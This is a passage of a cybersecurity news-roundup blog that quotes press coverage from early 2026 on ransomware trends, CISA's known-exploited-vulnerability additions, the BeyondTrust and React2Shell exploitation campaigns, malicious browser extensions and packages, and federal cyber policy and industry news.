    • “Ransomware gangs pulled in about $820 million in 2025, roughly 8 percent less than the year before, as the share of victims paying dropped to an all-time low of 28 percent. That drop might sound like progress if the wider picture weren’t so bleak: the median ransom demand jumped from $12,738 in 2024 to $59,556 in 2025, and the number of publicly claimed attacks climbed along with it.
    • “Despite the relative stability in total payments, ransomware attacks surged across multiple vectors in 2025, with eCrime.ch data showing a 50 percent YoY increase in claimed ransomware victims, marking the most active year on record,” Chainalysis said.”
  • Help Net Security adds,
    • Intrusions continue to center on credential access and timed execution outside standard business hours. The Sophos Active Adversary Report 2026 analyzes 661 incident response and managed detection and response cases handled between November 1, 2024 and October 31, 2025, spanning organizations in 70 countries.
    • “The dataset examines how attackers gain access, how quickly they reach key systems, and when ransomware and data theft occur.” * * *
    • “Timing patterns show that the most disruptive stages of ransomware incidents often occur when organizations are operating with reduced staffing. In 88% of ransomware cases, encryption was deployed during non business hours.
    • “Data exfiltration followed a similar pattern, with 79% of theft activity also occurring outside the typical workday.
    • “Off hours deployment increases the likelihood that encryption or large scale data transfers proceed without immediate interruption. It places emphasis on monitoring coverage that extends beyond standard schedules.”

From the cybersecurity business and defenses front,

  • Dark Reading reports,
    • “The cybersecurity venture capital market experienced unprecedented activity in 2025, driven primarily by the rush to AI-native security solutions and a massive surge in mergers and acquisitions that reached record levels.
    • “In 2025, VC firms invested $119 billion in cybersecurity businesses, with 400 M&A transactions accounting for the majority of funding and another 820 financing deals totaling nearly $21 billion, according to data from Momentum Cyber, a cybersecurity investment bank. The total value of M&A, financing, and IPO activity in 2025 nearly tripled that of deals in the previous year.”
  • and
    • “Cybersecurity experts are calling for a major shift in how companies handle data breaches and security failures, arguing that greater transparency and specific detail disclosure about how and why they occur is essential if the industry hopes to effectively reduce cyber-risk.
    • “At the upcoming RSAC Conference, threat research experts Adam Shostack and Adrian Sanabria will make the case for greater incident transparency and the need for structured feedback loops in cybersecurity, in a session aptly titled “A Failure Is a Terrible Thing to Waste: The Case for Breach Transparency,”scheduled for Monday, March 23.”
  • Cybersecurity Dive informs us,
    • “The AI era is transforming what CISOs do and how they do it, the enterprise software firm Splunk said in a report published on Tuesday [Feburary 24].
    • “Nearly all CISOs have been assigned to manage their organizations’ AI governance responsibilities, the report found, a significant expansion of “their already overwhelming mandates.”
    • CISOs interviewed in the report expressed both an awareness that they needed to use AI and a range of concerns about its potential harms.”
  • Dark Reading relates,
    • “As one ransomware community shutters in RAMP, two more pop up to take its place. 
    • “Rapid7 today published an analysis of that ransomware ecosystem after US authorities seized infrastructure tied to the notorious RAMP cybercrime forum last month. For years, RAMP has been the primary vehicle for acquiring ransomware-as-a-service (RaaS) affiliates, but the Jan. 28 interagency sting led by the FBI forced many cybercrime outfits to find a new means to sell their wares. 
    • “Rapid7’s Alexandra Blia and Efi Sherman in this week’s blog post identified two potential forums where attackers might go next. The bigger takeaway, however, is that the cybercrime ecosystem is fragmenting, and defenders will need to adapt.”
  • and
    • A newly developed method for gauging the impact of an OT cybersecurity incident could pave the way for more accurate measurement and response to an event, and also shine light on risk and business ramifications.
    • The Operational Technology Incident (OTI) Impact Score — which will be unveiled today [February 24] at the ICS/OT industry’s S4x26 Conference in Miami — aims to provide rapid clarity on the actual effects of OT cyber incidents, which often get over- or under-hyped, according to Dale Peterson, co-creator of the OTI model and head of ICS/OT consulting and research firm Digital Bond.
    • The OTI model, inspired by the Richter Scale used for measuring earthquake intensity and impact, is meant for OT business executives, governments, cyber insurers, the media, and the general public, according to Peterson, who is the founder and program chair of S4.
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity policy and law enforcement front,

  • Cyberscoop reports from its Cybertalks event held earlier this week.
    • “Department of Health and Human Services official said Thursday that HHS is devoting a lot of attention to the security of third-party service providers after the 2024 Change Healthcare cyberattack.
    • “That attack, which is widely regarded as the biggest ever in the sector — including by HHS’s Charlee Hess, who spoke Thursday at CyberTalks presented by CyberScoop — began with hackers exploiting the lack of multifactor authentication set up on a remote access portal at Change Healthcare.
    • “It wasn’t a hospital, it was a company most people have never heard of and had major impacts on our sector and threatened the liquidity of our entire health care system,” said Hess, director of the healthcare and public health sector cybersecurity at the Administration for Strategy Preparedness and Response division. “We recovered from that, but we realized there are third-party risks lurking in our health care system, and we don’t even know they’re there. Where are those entities or systems that will have an outsized impact on our sector?”
  • and
    • “A top FBI cyber official said Salt Typhoon, the Chinese cyber espionage group behind the widespread compromise of U.S. telecommunications infrastructure in 2024, continues to pose a broad threat to both America’s private and public sectors.
    • “Michael Machtinger, deputy assistant director for cyber intelligence at the FBI, touted improved partnerships between the telecommunications industry and government in the wake of the campaign while speaking at CyberTalks, presented by CyberScoop, in Washington D.C. Thursday.
    • Companies who engaged with the FBI and federal agencies like CISA early after the campaign went public “have been without a doubt the most successful in mitigating the impact of the Salt Typhoon intrusions,” he claimed.”
  • and
    • “The Trump administration wants to boost the use of artificial intelligence for security in a way that doesn’t increase the number of targets for adversaries to attack, a top official with the Office of the National Cyber Director said Thursday.
    • “The administration will “promote the rapid implementation of AI enabled cyber defensive tools to detect, divert and deceive threat actors who continue targeting our vital systems and sectors,” Alexandra Seymour, principal deputy assistant cyber director for policy, said at CyberTalks, presented by CyberScoop. “We want to ensure that as Americans, companies and agencies deploy AI to defend themselves, they are not inadvertently making themselves more vulnerable by widening the attack surface.”
    • “Overall, “We’re working with our interagency and White House colleagues to promote AI-driven success while addressing concerns about AI security and countering AI abuse by adversaries,” she said.
    • “The focus on AI is expected to get further attention from a forthcoming national cyber strategy and the implementation of that strategy due to follow.”
  • Federal News Network adds,
    • “The National Institutes of Standards and Technology is launching a new project around standards for artificial intelligence agents, with NIST positioning the project as key to advancing agentic AI innovation.
    • “NIST’s Center for AI Standards and Innovation (CAISI) announced the “AI Agent Standards Initiative” this week. The project aims to foster “industry-led technical standards and protocols that build public trust in AI agents, catalyze an interoperable agent ecosystem, and diffuse their benefits to all Americans and across the world,” NIST said in a release this week.
    • “AI agents can now work autonomously for hours, write and debug code, manage emails and calendars, and shop for goods, among other emerging use cases,” NIST added. “While the productivity promise is enticing, the real-world utility of agents is constrained by their ability to interact with external systems and internal data. Absent confidence in the reliability of AI agents and interoperability among agents and digital resources, innovators may face a fragmented ecosystem and stunted adoption.”
    • While NIST’s press release positioned the project around innovation, the initiative’s opening products are centered on security. Since AI agents can take actions autonomously, tech experts say they present significant safety and security concerns.
    • “The initiative’s initial outputs includes a request for information on “AI agent security.” The deadline for responses to the RFI is March 9.”
  • Per February 19, 2026, HHS news release,
    • “[T]he U.S. Department of Health and Human Services’ (HHS) Office for Civil Rights (OCR) announced a settlement with Top of the World Ranch Treatment Center (TWRTC), a substance use disorder treatment provider in Illinois, for a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule.” * * *
    • “The settlement resolves an investigation of TWRTC that OCR initiated after receiving a breach report that TWRTC filed in March 2023. TWRTC reported that, as a result of a successful phishing attack, an unauthorized third party accessed ePHI through a workforce member’s email account. TWRTC concluded that the ePHI for 1,980 patients was compromised by the attack. OCR’s investigation found evidence that TWRTC failed to conduct an accurate and thorough risk analysis to determine the potential risks and vulnerabilities to the confidentiality, integrity, and availability of the ePHI TWRTC holds as required by the HIPAA Security Rule.
    • “Under the terms of the resolution agreement, TWRTC agreed to implement a corrective action plan that OCR will monitor for two years, and paid $103,000 to OCR.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-ra-cap-twrtc.pdf [PDF, 249 KB]
  • Cyberscoop reports,
    • “A Ukrainian national who ran multiple operations to aid the North Korean government’s expansive scheme to  hire remote IT workers at U.S. companies was sentenced to five years in prison, the Justice Department said Thursday.
    • “Oleksandr Didenko stole U.S. citizens’ identities and created more than 2,500 fraudulent accounts on freelance IT job forums, money service transmitters, email services, and social media platforms to sell the proxy identities to North Korean workers. The 29-year-old pleaded guilty to multiple crimes related to the six-year scheme in November 2025.” * * *
    • “U.S. law enforcement has racked up some wins by seizing stolen cryptocurrency and targeting U.S.-based facilitators who provide forged or stolen identities for North Korean operatives. 
    • “Yet, the regime’s scheme runs deep. North Korean nationals have infiltrated many top global companies, and researchers continue to uncover evidence of new tactics and techniques operatives have used to evade detection.”

From the cybersecurity vulnerabilities and breaches front,

  • Bleeping Computer tells us,
    • “PayPal is notifying customers of a data breach after a software error in a loan application exposed their sensitive personal information, including Social Security numbers, for nearly 6 months last year.
    • “The incident affected the PayPal Working Capital (PPWC) loan app, which provides small businesses with quick access to financing.
    • “PayPal discovered the breach on December 12, 2025, and determined that customers’ names, email addresses, phone numbers, business addresses, Social Security numbers, and dates of birth had been exposed since July 1, 2025.
    • “The financial technology company said it has reversed the code change that caused the incident, blocking attackers’ access to the data one day after discovering the breach.
    • “On December 12, 2025, PayPal identified that due to an error in its PayPal Working Capital (“PPWC”) loan application, the PII of a small number of customers was exposed to unauthorized individuals during the timeframe of July 1, 2025 to December 13, 2025,” PayPal said in breach notification letters sent to affected users.”
  • The Cybersecurity and Infrastructure Security Agency (CISA) added eight known exploited vulnerabilities to its catalog during this shutdown week.
    • February 17, 2026
      • CVE-2008-0015 Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
      • CVE-2020-7796 
      • CVE-2024-7694 TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
      • CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability
        • Cybersecurity News discusses the MS Windows KVe here.
        • The Hacker News discusses the other three KVEs here.
    • February 18, 2026
      • CVE-2021-22175 GitLab Server-Side Request Forgery (SSRF) Vulnerability
      • CVE-2026-22769 Dell RecoverPoint for Virtual Machines (RP4VMs) Use of Hard-coded Credentials Vulnerability
        • DeV discusses the Gitlab KVE here.
        • Bleeping Computer discusses the Dell KVE which demands immediate attention.
    • February 20, 2026
      • CVE-2025-49113 RoundCube Webmail Deserialization of Untrusted Data Vulnerability
      • CVE-2025-68461 RoundCube Webmail Cross-site Scripting Vulnerability
        • The Hacker News discusses these KVEs here.
  • Cybersecurity Dive reports,
    • “A critical vulnerability in BeyondTrust Remote Support is facing an increase in threat activity, with hackers deploying SparkRAT and vShell backdoors and using remote management tools to conduct reconnaissance, according to a blog post released Thursday by Palo Alto Networks’ Unit 42. 
    • “Multiple BeyondTrust Remote Support users have been confirmed targets, and a range of industries have been impacted, including financial services, technology, higher education, legal services and healthcare among others. 
    • “The vulnerability, tracked as CVE-2026-1731, is an operating system command injection flaw that also impacts some older versions of BeyondTrust Privileged Remote Access. 
    • “The flaw was originally discovered by researchers at Hacktron and disclosed to BeyondTrust.”
  • Per an HHS announcement,
    • “The Department of Health and Human Services (HHS) encourages Healthcare and Public Health (HPH) sector organizations to review and address a critical vulnerability identified in BeyondTrust Remote Support and Privileged Remote Access solutions in light of rising cyber attacks affecting the sector.
    • “BeyondTrust published Security Advisory BT26-02 regarding a critical pre-authentication remote code execution vulnerability, identified as CVE-2026-1731, affecting Remote Support and older versions of Privileged Remote Access. The vulnerability carries a CVSSv4 score of 9.9 and may be triggered through specially crafted client requests, potentially allowing an unauthenticated remote attacker to execute operating system commands in the context of the site user. 
    • “The vulnerability affects Remote Support version 25.3.1 and prior and Privileged Remote Access version 24.3.4 and prior, with remediation available through specific patches or by upgrading to fixed versions. BeyondTrust issued patches on February 2, 2026, which were automatically deployed to instances with the update service enabled and fully applied to Software as a Service environments. BeyondTrust applied patches to all SaaS customers as of February 2, 2026, and instructed self-hosted customers to manually apply updates or upgrade to supported versions where necessary. For additional information, organizations are encouraged to review the BeyondTrust Security Advisory.”
  • Dark Reading relates,
    • “New data suggests a cyber espionage group is laying the groundwork for attacks against major industries.
    • “The “React2Shell” vulnerability is already almost a few months old, but it’s far from over. An unknown but possibly state-sponsored threat actor has been using a newly discovered, maturely named toolkit — “ILovePoop” — to probe tens of millions of Internet protocol (IP) addresses worldwide, looking for opportunities to exploit React2Shell. A report from WhoisXML API, shared with Dark Reading, suggests the threat actor might be out for big game: government, defense, finance, and industrial organizations, among others, around the world but particularly in the United States.
    • “A few months later, the situation has yet to calm down, Pham says. “There are still tens of thousands of vulnerable instances exposed on the internet, and additional botnets have added React2Shell to their arsenals. It has also been confirmed in ransomware campaigns,” she says. 
    • The big difference now is that the attacks have gotten more sophisticated, as the attackers have had more time to gameplan. “The post-exploitation tradecraft has gotten more sophisticated over time. We are seeing things like PeerBlight’s use of the BitTorrent DHT as a resilient C2 fallback, which is a technique designed specifically to survive traditional domain takedowns,” Phams says.” * * *
    • “Patching a deep-rooted vulnerability like React2Shell isn’t as simple as clicking an “Update” button.”
  • and
    • “When Hillai Ben Sasson and Dan Segev set out to hack AI infrastructure two years ago, they expected to find vulnerabilities — but they didn’t expect to compromise virtually every major AI platform they targeted.
    • “The two researchers — who work in offensive and defensive research, respectively, at cloud-security firm Wiz — wanted to experiment with how they could attack the AI infrastructure being deployed as part of foundational models, AI services, and in-house AI projects. Yet, what started as simple attacks on the AI supply chain — such as abusing the widely used Pickle format to run arbitrary code — evolved into a comprehensive threat assessment spanning five distinct layers of the AI stack.
    • “They plan to present the lessons learned over their two years of research at the upcoming RSAC Conference in March. Perhaps the most important lesson: Focus on the infrastructure used to to train, run, and host AI services, and not on prompt-injection attacks, says Segev, a security architect in the Office of the CTO at Wiz.”
  • and
    • “A growing phishing-as-a-service (PhaaS) tool reliably undermines traditional methods for detecting phishing attacks, both technical and psychological.
    • “Starkiller,” described this week by researchers at Abnormal AI, is packaged and sold with a sleekness comparable to legitimate software-as-a-service (SaaS) platforms. It’s got a clean, retrofuturist dashboard, sporting real-time campaign analytics. It gets periodic updates, and even allows its cybercriminal users to log in using two-factor authentication (2FA).
    • “It’s got substance to back up its style, too. Its website advertises “enterprise-grade phishing infrastructure” for “campaigns that bypass modern security systems.” Though its self-reported 99.7% success rate is almost certainly fictional, it really does help attackers bypass many of the traditional phishing security techniques so many enterprises rely on, according to Abormal AI’s research.”
  • Cybersecurity Dive notes,
    • “The vulnerability of the “connective tissue” of the AI ecosystem — the Model Context Protocol and other tools that let AI agents communicate — “has created a vast and often unmonitored attack surface” that is making it easier for hackers to use AI to launch cyberattacks, Cisco said in a report published Thursday [February 19].
    • “Cisco said AI tools’ increasing ability to “execute processes, access databases, and push code on behalf of humans” has become the dominant AI risk and warned companies not to give AI “unsupervised control over critical business functions.”
    • “The new report also described nation-state hackers’ use of AI and warned businesses about potential AI supply-chain crises.”

From the ransomware front,

  • Bleeping Computer reports,
    • “The University of Mississippi Medical Center (UMMC) closed all its clinic locations statewide on Thursday [February 19] following a ransomware attack.
    • “UMMC has over 10,000 employees and, as one of the largest employers in Mississippi, operates seven hospitals, 35 clinics, and more than 200 telehealth sites statewide. The medical center includes the state’s only children’s hospital, only Level I trauma center, only organ and bone marrow transplant program, and the only Telehealth Center of Excellence, one of two across the United States.
    • “As revealed on Thursday afternoon, the cyberattack took down many of its IT systems and blocked access to the Epic electronic medical records. While UMMC cancelled outpatient and ambulatory surgeries/procedures and imaging appointments, officials said hospital services continue via downtime procedures.”
  • The HIPAA Journal points out ransomware attacks against three other healthcare entities.
    • “Issaqueena Pediatric Dentistry in South Carolina, Enhabit Home Health & Hospice in Texas, and AltaMed Health Services in California have announced that patient data has potentially been compromised in ransomware attacks.”
  • Per an Arctic Wolf news release,
    • “Arctic Wolf®, a global leader in security operations, today [February 17] published the 2026 edition of its Threat Report, which analyzes hundreds of real‑world incident response engagements and threat intelligence findings from the past year. The report reveals a continued rise in data‑theft‑driven extortion, sustained pressure from ransomware groups, and a significant increase in attacks that leverage remote access tools rather than technical exploits.
    • “In 2025, ransomware, business email compromise (BEC), and data incidents once again dominated Arctic Wolf’s caseload, accounting for 92% of all incident response engagements. While ransomware remained the most common category, data‑only extortion incidents surged 11x year over year, signaling a strategic shift as threat actors adapt to improved organizational recovery capabilities. The report also finds that 65% of non‑BEC intrusions stemmed from abuse of remote access technologies like RDP, VPN, and RMM tools; which is a dramatic rise that underscores attackers’ preference for low‑friction entry points.
    • “Attackers continue to rely on operational efficiency – logging in instead of breaking in, stealing data instead of encrypting it, and exploiting trusted tools rather than complex vulnerabilities,” said Ismael Valenzuela, vice president, Labs, Threat Research & Intelligence, Arctic Wolf. “Organizations that invested in visibility, identity security, and disciplined remote access controls were far more resilient throughout the year.”
  • Cybersecurity Dive adds,
    • “Hackers are using ransomware to accelerate the timeline for cyberattacks, moving on average four times faster than just a year ago, according to an incident response report released Tuesday by Palo Alto Networks. 
    • “AI is being used for reconnaissance, phishing and scripting, and operational execution in many cases. In the most efficient attacks, groups exfiltrate data just 72 minutes after initial access. 
    • Identity is a primary element in attacks, showing up in 90% of incident response cases. Threat groups are increasingly using stolen identities and tokens to gain entry without triggering security warnings.  
    • “Once an attacker has legitimate credentials, they’re not breaking in, they’re logging in,” Sam Rubin, a senior vice president at Palo Alto Networks’ Unit 42, told Cybersecurity Dive. “When an adversary blends into normal traffic, detection becomes incredibly challenging for even mature defenders.”
    • “The report is based on analysis of more than 750 incident response casesacross the globe that involved Unit 42 analysts and researchers.” 
  • Qualsys assesses “What Is Black Basta Ransomware and How to Mitigate Attack.”
  • IT Brew considers how a ransomware attacker thinks.
    • “When it comes to ransomware criminals, the answers can vary. Some organizations are sophisticated businesses where hackers are treated as employees with HR departments and paid time-off, while others are more ramshackle.
    • “But they’re all dangerous—and after your data. Mike Puglia, general manager of cybersecurity labs at Kaseya, told IT Brew that financial motivation has been the constant motive of ransomware attackers. The tactics are much the same between groups: gaining access, exploiting vulnerabilities, escalating privileges, and deploying an encrypter to hold the data for payment.
    • “It’s Whac-a-Mole, or a game of cat and mouse, between defenders and attackers, and as soon as one hole is closed, suddenly the next wave comes,” Puglia said.”
  • Per an HHS announcement,
    • “The National Institute of Standards and Technology (NIST) hosted a virtual event titled Resources for Ransomware Risk Management on January 28, 2026. The event focused on ransomware as a persistent risk to organizations of all sizes and sectors and emphasized the need for cross-sector collaboration to develop practical resources for reducing ransomware risk. Speakers from NIST, the Center for Internet Security, and the Institute for Security and Technology (IST) provided an overview of available ransomware risk management resources designed to help organizations establish foundational safeguards and build effective strategies. Featured resources included the NIST Ransomware Risk Management Cybersecurity Framework 2.0 Community Profile, published as an initial public draft, and the IST and Ransomware Task Force Blueprint for Ransomware Defense, which offers an actionable framework tailored for small to medium-sized enterprises. Presenters described the development and use of these resources and discussed ongoing and future efforts in ransomware risk management, with the session allowing time for audience questions and discussion. For additional details, refer to the Ransomware Risk Management webinar.”

From the cybersecurity business and defenses front,

  • The Wall Street Journal reports,
    • Palo Alto Networks PANW lifted its full-year revenue outlook after recording a jump in second-quarter profit driven by continued demand for cybersecurity services.
    • “However, the company issued per-share earnings guidance for its current quarter below Wall Street expectations, in part as it contends with higher costs for memory and storage. It plans to raise prices later in the fiscal year to offset the increases.
    • “The stock, which has dropped 11.2% to start the year, fell 8% in late trading Tuesday to $150.46.
    • “The Santa Clara, Calif.-based company on Tuesday [February 17] said it now expects full-year revenue to come in between $11.28 billion and $11.31 billion, up from a range of $10.5 billion to $10.54 billion.
    • “The raised revenue view came after Palo Alto reported a profit of $432 million, or 61 cents a share, for its fiscal second quarter, compared with a profit of $267.3 million, or 38 cents a share the prior year.”
  • Cybersecurity Dive adds,
    • “As investors worry that existing software and services could be rendered obsolete, Palo Alto Networks CEO Nikesh Arora said the rapid acceleration of AI should not be considered a threat to cybersecurity. 
    • “Arora addressed the concerns on Tuesday during the company’s fiscal second-quarter conference call, where the surge in AI dominated much of the discussion. 
    • “As AI becomes more pervasive across the enterprise, it expands the attack surface area, more infrastructure, more machine-to-machine activity and new classes of risk that simply didn’t exist before,” Arora said. “In that environment, security cannot sit on the sidelines.”
    • “Arora said despite the current sentiment about software and AI, the company believes that security is the enabling layer “that allows innovation to move forward safely and at scale.”
  • and
    • “Businesses need to pay attention to identity security and third-party risk management to avoid falling prey to hackers whose techniques have evolved, the risk intelligence company Dataminr said in a threat report published on Wednesday [February 18].
    • “2025 marked a clear shift from ‘frequent but contained’ cyber losses toward fewer events with materially larger financial and mission impact,” the report said, attributing the shift to “multi-vector attacks” leveraging stolen credentials, data theft, operational disruptions and regulatory exposure.
    • “Dataminr’s report contains several high-priority recommendations for enterprises, including about supply chain security and the need to look beyond a vulnerability’s severity score.”
  • Dark Reading offers “A CISO’s Playbook for Defending Data Assets Against AI Scraping.”
    • “Discover a strategic approach to govern scraping risks, balance security with business growth, and safeguard intellectual capital from automated data harvesting.”
  • Cyberscoop relates,
    • “Anthropic is rolling out a new security feature for Claude Code that can scan a user’s software codebases for vulnerabilities and suggest patching solutions.
    • “The company announced Friday that Claude Code Security will initially be available to a limited number of enterprise and team customers for testing. That follows more than a year of stress-testing by the internal red teamers, competing in cybersecurity Capture the Flag contests and working with Pacific Northwest National Laboratory to refine the accuracy of the tool’s scanning features.
    • “Large language models have shown increasing promise at both code generation and cybersecurity tasks over the past two years, speeding up the software development process but also lowering the technical bar required to create new websites, apps and other digital tools.
    • “We expect that a significant share of the world’s code will be scanned by AI in the near future, given how effective models have become at finding long-hidden bugs and security issues,” the company wrote in a blog post.”
  • Tech Target shares a “CISO’s guide to demonstrating cyber resilience.”
    • “Elevating cybersecurity to a state of resilience requires a security team to adapt and strengthen defenses. The result should be that a future attack is less likely to succeed.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity policy front,

  • Per a February 11, 2026, Cybersecurity and Infrastucture Security Agency news release,
    • “The Cybersecurity and Infrastructure Security Agency (CISA) unveiled its 2025 Year in Review today, spotlighting bold achievements that strengthened the nation’s cyber and physical security in 2025. The report underscores CISA’s commitment to innovation, resilience, and collaboration. This report is a snapshot of goals achieved for this past year. Year over year CISA’s goals change as the threat landscape evolves and as we lean into core mission objectives as determined by the Administration’s policies. 
    • “The Year in Review is more than a report – it’s proof of CISA’s unwavering commitment to protecting the infrastructure and systems Americans count on every day,” said CISA Acting Director Madhu Gottumukkala. “From safeguarding federal networks to equipping communities with tools to reduce risk, our team delivered measurable results in 2025. And we’re not slowing down – we will lead with innovation, resilience and partnership to stay ahead of tomorrow’s threats.”
  • Federal News Network reports,
    • “Sen. Ron Wyden (D-Ore.) is pledging to keep his hold on the nominee to lead the Cybersecurity and Infrastructure Security Agency. Wyden said he will continue to object to Sean Plankey’s nomination until CISA releases a 2022 report on security flaws in the U.S. telecommunications system. Wyden previously held up Plankey’s nomination for much of last year over the same issue. (Sen. Ron Wyden (D-Ore.) floor remarks – Congress.gov)”
  • Cyberscoop tells us,
    • “A recent attempt at a destructive cyberattack on Poland’s power grid has prompted the Cybersecurity and Infrastructure Security Agency to publish a warning for U.S. critical infrastructure owners and operators.
    • Tuesday’s alert follows a Jan. 30 report from Poland’s Computer Emergency Response Team concluded the December attack overlapped significantly with infrastructure used by a Russian government-linked hacking group, and that it targeted 30 wind and photovoltaic farms, among others.
    • “CISA said its warning was meant to “amplify” that Polish report. In particular, CISA said the attack highlighted the threats to operational technology and industrial control systems, most commonly used in the energy and manufacturing sectors.
    • ‘And CISA’s alert continues a recent agency focus on securing edge devices like routers or firewalls, after a binding operational directive last week to federal agencies to strip unsupported products from their systems.”
  • Cybersecurity Dive relates,
    • “The Cybersecurity and Infrastructure Security Agency wants critical infrastructure partners’ feedback on the scope of its cyber-incident reporting regulation as the agency homes in on a final version of the long-awaited rule.
    • “In a notice set for publication in the Federal Register on Friday [January 13], CISA announced a series of town hall meetings where different sectors will be able to share their thoughts about the pending rule, which Congress required in the 2022 Cyber Incident Reporting for Critical Infrastructure Act.
    • A draft version of the CIRCIA rule, published in April 2024, gave covered infrastructure operators 72 hours to report substantial cyber incidents to the government. Business groups and some lawmakers objected to the scope of the information that companies would need to report, as well as to the breadth of companies covered under the regulation.
    • “In its new announcement, CISA said it “appreciates stakeholders’ interest and concern that CISA implement CIRCIA to maximize its impact on improving our nation’s cybersecurity posture while minimizing unnecessary burden to entities in critical infrastructure sectors.”
    • “The agency wants infrastructure operators to share “specific, actionable improvements” to CIRCIA that “clarify or reduce” the burden of the planned reporting requirement while still giving the government ample information about the cyber-threat landscape.”
    • The virtual town hall meeting for the Emergency Services Sector, Government Facilities Sector, Healthcare and Public Health Sector is scheduled for March 17, 2026.
  • Federal News Network reports,
    • “The Cybersecurity and Infrastructure Security Agency plans to designate 888 of its 2,341 employees as excepted during a shutdown. All of those employees would go without pay during a shutdown.
    • “A shutdown forces many of our frontline security experts and threat hunters to work without pay— even as nation-states and criminal organizations intensify efforts to exploit critical systems that Americans rely on—placing an unprecedented strain on our national defenses,” Acting CISA Director Madhu Gottumukkala toldlawmakers this week.
    • “The cyber agency’s core responsibilities include defending federal agency networks and working with critical infrastructure to strengthen their security.
    • “Gottumukkala said that a shutdown would delay the deployment of new cyber services to federal networks and the sharing of guidance with critical infrastructure partners. It would also likely delay CISA’s work to finalize a landmark cyber incident reporting rule.

From the cybersecurity vulnerabilities and breaches front,

  • CISA added eleven known exploited vulnerabilities to its catalog this week.
    • February 10, 2026
      • CVE-2026-21510 Microsoft Windows Shell Protection Mechanism Failure Vulnerability
      • CVE-2026-21513 Microsoft MSHTML Framework Security Feature Bypass Vulnerability
      • CVE-2026-21514 Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
      • CVE-2026-21519 Microsoft Windows Type Confusion Vulnerability
      • CVE-2026-21525 Microsoft Windows NULL Pointer Dereference Vulnerability
      • CVE-2026-21533 Windows Remote Desktop Services Elevation of Privilege Vulnerability
        • SecPod discusses these KVEs here
    • February 12, 2026
      • CVE-2024-43468 Microsoft Configuration Manager SQL Injection Vulnerability
      • CVE-2025-15556 Notepad++ Download of Code Without Integrity Check Vulnerability
      • CVE-2025-40536 SolarWinds Web Help Desk Security Control Bypass Vulnerability
      • CVE-2026-20700 Apple Multiple Buffer Overflow Vulnerability
        • Nopsec discusses the MS Configuration KVE here.
        • WNEsecurity discusses the Notepad++ KVE here.
        • Rapid7 discusses the Solarwinds KVE here.
        • Bleeping Computer discusses the Apple KVE here.
    • February 13, 2026
      • CVE-2026-1731 BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) OS Command Injection Vulnerability
        • The Hacker News discusses this KVE here.
  • Cybersecurity Dive informs us,
    • “Security researchers warn that threat groups are exploiting critical vulnerabilities in SmarterMail, a business email and collaboration server that small to medium-sized businesses use as an alternative to Microsoft Exchange. 
    • “A China-linked threat actor, tracked as Storm 2603, has exploited an authentication bypass vulnerability tracked as CVE-2026-23760 to deploy Warlock ransomware, according to a blog released Monday by researchers at Reliaquest. 
    • “The hacker abuses legitimate administrative functions to hide its activity from security teams. It then installs a digital forensic tool called Velociraptor to maintain access in preparation for potential ransomware attacks, according to Reliaquest. 
    • “SmarterTools, the parent company behind SmarterMail, confirmed in a Feb. 3 blog post that its own network was impacted by a Jan. 29 breach.” 
  • and
    • “More than 80% of exploitation activity targeting critical vulnerabilities in Ivanti Endpoint Manager Mobile were traced to a single IP address hiding behind a bulletproof hosting infrastructure, according to a report released Tuesday by GreyNoise. 
    • Researchers warn that several of the most shared indicators of compromise linked to the current threat campaign indicate no activity linked to Ivanti EPMM. The concern is that security teams may therefore be looking for the wrong information, as current IoCs indicate scanning for Oracle WebLogic instead, according to GreyNoise researchers.”
  • Cyberscoop notes,
    • “A new report from Google found evidence that state-sponsored hacking groups have leveraged AI tool Gemini at nearly every stage of the cyber attack cycle.
    • “The research underscores how AI tools have matured in their cyber offensive capabilities, even as it doesn’t reveal novel or paradigm shifting uses of the technology.
    • J”ohn Hultquist, chief analyst at Google’s Threat Intelligence Group, told CyberScoop that many countries still appear to be experimenting with AI tools, determining where they best fit into the attack chain and provide more benefit than friction.
    • “Nobody’s got everything completely worked out,” Hultquist said. “They’re all trying to figure this out and that goes for attacks on AI, too.
    • “But the report also reveals that frontier AI models can build speed, scale and sophistication into a myriad of hacking tasks, and state-sponsored hacking groups are taking advantage.”
  • Bleeping Computer points out,
    • “Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries.
    • “At least two variants of the malicious activity have been observed in the wild, and more than 10,000 users have accessed the content with dangerous instructions.
    • “A Claude artifact is content generated with Antropic’s LLM that has been made public by the author. It can be anything from instructions, guides, chunks of code, or other types of output that are isolated from the main chat and accessible to anyone via links hosted on the claude.ai domain.”
  • and
    • “A set of 30 malicious Chrome extensions that have been installed by more than 300,000 users are masquerading as AI assistants to steal credentials, email content, and browsing information.
    • “Some of the extensions are still present in the Chrome Web Store and have been installed by tens of thousands of users, while others show a small install count.
    • “Researchers at browser security platform LayerX discovered the malicious extension campaign and named it AiFrame. They found that all analyzed extensions are part of the same malicious effort as they communicate with infrastructure under a single domain, tapnetic[.]pro.”
  • and
    • “A new variation of the fake recruiter campaign from North Korean threat actors is targeting JavaScript and Python developers with cryptocurrency-related tasks.
    • “The activity has been ongoing since at least May 2025 and is characterized by modularity, which allows the threat actor to quickly resume it in case of partial compromise.
    • “The bad actor relies on packages published on the npm and PyPi registries that act as downloaders for a remote access trojan (RAT). In total, researchers found 192 malicious packages related to this campaign, which they dubbed ‘Graphalgo’.
    • “Researchers at software supply-chain security company ReversingLabs say that the threat actor creates fake companies in the blockchain and crypto-trading sectors and publishes job offerings on various platforms, like LinkedIn, Facebook, and Reddit.”
  • TechRadar advises
    • “If you’re using an older Android phone, Google has a message you probably don’t want to hear.
    • “More than 40% of Android devices worldwide no longer receive critical security updates, leaving over 1 billion phones exposed to malware and spyware attacks, according to the company.
    • “The problem isn’t a sudden flaw but a slow drift. Android adoption data shows most users are still running software versions that Google no longer fully supports. While recent confusion around Google Play system update dates has raised concerns, Google says that the issue is cosmetic.
